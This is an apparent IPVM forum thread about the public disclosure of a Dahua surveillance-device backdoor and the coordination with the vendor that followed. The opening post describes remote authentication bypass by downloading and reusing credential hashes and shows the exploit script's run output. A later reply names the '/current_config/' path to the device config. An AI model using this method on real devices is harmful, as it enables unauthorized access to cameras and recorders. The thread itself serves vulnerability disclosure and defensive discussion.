Subscriber Discussion

0-Day: Dahua Backdoor Generation 2 & 3

Undisclosed End User #1

03/05/17 09:38am

[IPVM Update: Researcher had shared code but has removed it temporarily and is communication with Dahua. More details inside discussion.]

[IPVM Update: full report and testing findings released of the Dahua backdoor here.]

[STX]

I'm speechless, and almost don't know what I should write... I (hardly) can't believe what I have just found.

I have just discovered (to what I strongly believe is backdoor) in Dahua DVR/NVR/IPC and possible all their clones.

Since I am convinced this is a backdoor, I have my own policy to NOT notify the vendor before the community.
(I simply don't want to listen on their poor excuses, their tryings to keep me silent for informing the community)

In short:
You can delete/add/change name on the admin users, you change password on the admin users - this backdoor simply don't care about that!
It uses whatever names and passwords you configuring - by simply downloading the full user database and use your own credentials!

This is so simple as:
1. Remotely download the full user database with all credentials and permissions
2. Choose whatever admin user, copy the login names and password hashes
3. Use them as source to remotely login to the Dahua devices

This is like a damn Hollywood hack, click on one button and you are in...


Below PoC you will find here: [REMOVED]
Please have understanding of the quick hack of the PoC, I'm sure it could be done better.

Have a nice day
/bashis

$ ./dahua-backdoor.py --rhost 192.168.5.2

[*] [Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]

[i] Remote target IP: 192.168.5.2
[i] Remote target PORT: 80
[>] Checking for backdoor version
[<] 200 OK
[!] Generation 2 found
[i] Chosing Admin Login: 888888, PWD hash: 4WzwxXxM
[>] Requesting our session ID
[<] 200 OK
[>] Logging in
[<] 200 OK
{ "id" : 10000, "params" : null, "result" : true, "session" : 100385023 }

[>] Logging out
[<] 200 OK

[*] All done...
$

$ ./dahua-backdoor.py --rhost 192.168.5.3

[*] [Dahua backdoor Generation 2 & 3 (2017 bashis <mcw noemail eu>)]

[i] Remote target IP: 192.168.5.3
[i] Remote target PORT: 80
[>] Checking for backdoor version
[<] 200 OK
[!] Generation 3 Found
[i] Choosing Admin Login: admin, Auth: 27
[>] Requesting our session ID
[<] 200 OK
[i] Downloaded MD5 hash: 94DB0778856B11C0D0F5455CCC0CE074
[i] Random value to encrypt with: 1958557123
[i] Built password: admin:1958557123:94DB0778856B11C0D0F5455CCC0CE074
[i] MD5 generated password: 2A5F4F7E1BB6F0EA6381E4595651A79E
[>] Logging in
[<] 200 OK
{ "id" : 10000, "params" : null, "result" : true, "session" : 1175887285 }

[>] Logging out
[<] 200 OK

[*] All done...
$

[ETX]

 

Agree
Disagree
Informative
Unhelpful
Funny

Undisclosed #2

IPVMU Certified | 03/05/17 09:49am

If you enjoyed 'Dahua Backdoor' by bashis, check out some of his other Greatests Hits...

[IPVM Note: bashis also discovered the Axis critical security vulnerability last year]

Agree
Disagree
Informative: 1
Unhelpful
Funny

Undisclosed Integrator #3

In reply to Undisclosed #2 | 03/05/17 10:50am

So this is legit?  Is it really a backdoor/intentional or just a security vulnerability?

Agree
Disagree
Informative
Unhelpful
Funny

Undisclosed #2

IPVMU Certified | In reply to Undisclosed Integrator #3 | 03/05/17 04:12pm

IMHO, all backdoors are intentional.

Some though are just laziness, for testing and debugging and service issues.

Others could be used as a way to control the device against the wishes of the owner.

bashis, what was the intent here, do you think?

Agree
Disagree
Informative: 1
Unhelpful
Funny

Undisclosed End User #1

In reply to Undisclosed #2 | 03/05/17 06:51pm

I can only speculate into why and for what purpose, which i prefer not to.

In DVR/NVR they use one (threaded) application for everything, named "Challenge", which is statically linked by the way.

In IPC/VTO they also use one (threaded) application, named "Sonia", dynamically linked.

To "Challenge" there is a another application named "dvrhelper", and for "Sonia", there is "systools", that will open up a debug/control port on TCP/6789 with direct access into Challenge/Sonia (l/p protected of course) where almost everything can be done, including providing remote shell.

 The name "Challenge" and statically linked binary caught my interest for deeper investigation.

They seems to share same codebase (binary wise you will find several 100% identical functions), so I could expect there is another Dahua HW carrying same thing.

Anyhow, by using the tag "/current_config/", you have access to everything located within "/mnt/mtd/Config", but in the code they only refer to: "/current_config/preLanguage" and "/current_config/WebCapConfig".

 

Agree
Disagree
Informative: 1
Unhelpful
Funny

Andrew Tierney

In reply to Undisclosed End User #1 | 03/07/17 05:35pm

Sounds very similar to a lot of other DVRs, though the binary is called Sofia on XM and Yale DVRs.

Agree
Disagree
Informative
Unhelpful
Funny
Avatar

Brian Karas

IPVM | 03/05/17 10:52am

$ ./dahua-backdoor.py --rhost 192.168.5.2

This looks like it was targeting devices on the same subnet. Does it work the same from a remote IP?

Also what is Generation 2 and 3 referring to? A rev of hardware?

Agree
Disagree
Informative
Unhelpful
Funny

Undisclosed End User #1

In reply to Brian Karas | 03/05/17 06:08pm

Remote IP works. (It's normal HTTP/HTTPS request)

Generation 2 and 3 is the version of user database/hash.

Gen 1: Base64

Gen 2: Dahua 48bit algorithm

Gen 3: MD5

 

Agree
Disagree
Informative
Unhelpful
Funny

Undisclosed #4

03/05/17 11:48am

Perhaps we should start a thread about who OEMs Dahua...

Agree
Disagree
Informative
Unhelpful
Funny

John Honovich

IPVM | In reply to Undisclosed #4 | 03/05/17 11:55am

#4, before we go there, we need to be sure what versions / generations this impacts. For example, is it currently shipping product? If not, how old? What firmware versions? etc.

Agree: 2
Disagree
Informative
Unhelpful
Funny

Undisclosed End User #1

In reply to John Honovich | 03/05/17 07:02pm

Current and past.

Agree
Disagree
Informative: 3
Unhelpful
Funny

John Honovich

IPVM | In reply to Undisclosed End User #1 | 03/05/17 09:02pm

Current and past.

Ok, that's very serious then.

Dahua has responded to us and is investigating this. Before we do anything in terms of publicizing this, we want to make sure either (1) we can replicate it ourselves with current Dahua firmware / models (which we plan to do today / tomorrow) and if possible (2) Dahua can provide a statement / response / plan.

Can Dahua contact you at mcw@noemail.eu? Are you willing to speak with them?

Agree
Disagree
Informative
Unhelpful
Funny

Undisclosed #2

IPVMU Certified | In reply to Undisclosed #4 | 03/05/17 04:09pm

Perhaps we should start a thread about who OEMs Dahua...

We could call it Who OEMs Dahua?

;)

Agree
Disagree
Informative
Unhelpful
Funny: 2

John Honovich

IPVM | 03/06/17 12:08am

UPDATE: Dahua is in communication with Bashis. Bashis has removed the code temproarily, noting:

I have received request from Dahua for temporally remove this code.

Code will be removed until 5 April, to give them 30 days to address the problem.

Sorry, bashis

Related, this indicates that Dahua is acknowledging that this is legitimate. We are in communication with Dahua to understand what specific models are impacted and when the fix is released.

Agree
Disagree
Informative: 1
Unhelpful
Funny

Undisclosed #2

IPVMU Certified | In reply to John Honovich | 03/06/17 02:32am

Dahua in the meantime is in a race against the bots for control of possibly every publicly facing Dahua device.   Not just default cred ones.

While Dahua still can, they need to write something to enter their own backdoor and disable it permanently.

They need to run it on every and any Dahua device they can find publicly.  Otherwise, once these devices are subverted by another organization, they may forever be used against the rest of the Internet.

Yes, this is questionably legally, but practically it is in the best interests of the Dahua owners themselves and the Internet at large.

Whatever legal fallout occurs would be Dahua just desserts for the unforced error in the first place. 

Agree: 1
Disagree: 1
Informative
Unhelpful
Funny

John Honovich

IPVM | In reply to Undisclosed #2 | 03/06/17 03:03am

Yes, this is questionably legally, but practically it is in the best interests of the Dahua owners themselves and the Internet at large.

Remember: Should I Hack 10,000 Dahua Cameras? ;) You may want to update that to Should Dahua Hack 10 million Dahua devices?

And what about the OEMs? How many of their devices are vulnerable? 

And the product that is shipped and in inventory around the globe? The boxes on ADI shelves, etc.

There's a lot of coordination that needs to be done.

 

Agree: 2
Disagree
Informative
Unhelpful
Funny

Undisclosed #5

In reply to John Honovich | 03/06/17 03:35am

JH,

Are we going to have a little break from HIK talk?
Can we talk about Dahua for next 3 month please :)
Thank you

Agree
Disagree: 1
Informative
Unhelpful: 3
Funny: 2

John Honovich

IPVM | In reply to Undisclosed #5 | 03/06/17 04:10am

#5, sigh...

IPVM is your enemy when it criticizes your line. IPVM is your friend when it criticizes your competitor. 

This certainly is going to be the lead story on IPVM this week and the ramifications may take a while to play out and cover.

Agree: 3
Disagree
Informative
Unhelpful
Funny

Andrew Tierney

In reply to Undisclosed #2 | 03/07/17 05:38pm

Unless the web interface allows escalation to access of the system itself, the risk is solely to the video functionality. This doesn't allow the devices to be recruited into a botnet.

Agree
Disagree
Informative
Unhelpful
Funny

Jay Hobdy

IPVMU Certified | 03/06/17 05:27am

So are we basically saying if the device is exposed to the internet, one could  just upload their own log in?

I suppose if the device is behind a firewall or vpn this would not be possible?

Agree
Disagree
Informative
Unhelpful
Funny

Undisclosed End User #1

In reply to Jay Hobdy | 03/06/17 05:34am

We could do, but it's easier to first download your's credentials and use them.

Well, UPnP disabled?

Agree
Disagree
Informative: 1
Unhelpful
Funny

John Honovich

IPVM | 03/06/17 09:42am

Two updates:

Karas verified the script worked on a current Dahua IP camera.

I have notified as many Dahua OEMs as I personally know.

We expect more information Monday.

Agree: 1
Disagree
Informative: 2
Unhelpful
Funny

Robert Shih

Independent
In reply to John Honovich | 03/06/17 12:46pm

I'll be checking it out. Not sure if I have the script downloaded though.

Agree
Disagree
Informative
Unhelpful
Funny

John Honovich

IPVM | 03/06/17 11:49pm

Update: we plan to publish our full report and test findings at 4pm today (03/06/17).

Update #2: see Dahua Backdoor Uncovered for full report

 

Agree
Disagree
Informative
Unhelpful
Funny
Top Comment Votes - Past 3 Months
  • 1. John Honovich - 1351
  • 2. Dwayne Cooney - 507
  • 3. Brian Karas - 377
  • 4. Marty Major - 320
  • 5. Michael Miller - 314
  • 6. Andrew Myers - 302
  • 7. Brian Rhodes - 272
  • 8. Matt Bischof - 225
  • 9. Ross Vander Klok - 157
  • 10. Carsen Whiteside - 130
  • 11. Aiden Gonzalez - 129
  • 12. Kyan Mahadeo - 128
  • 13. Ethan Ace - 124
  • 14. Mert Karakaya - 114
  • 15. Greg Cortina - 112
  • 16. Shannon Davis - 111
  • 17. Sean Patton - 99
  • 18. Lynn Harold - 82
  • 19. Hans Kahler - 81
  • 20. Donald Maye - 74
Manufacturers
Tools

BestMatch

Design Calculator

Online Shows

Camera Finder

F-Stop Calculator

Chat

Integrator Finder

News Spider

Camera Comparison

Quizzes

Pages

About

Contact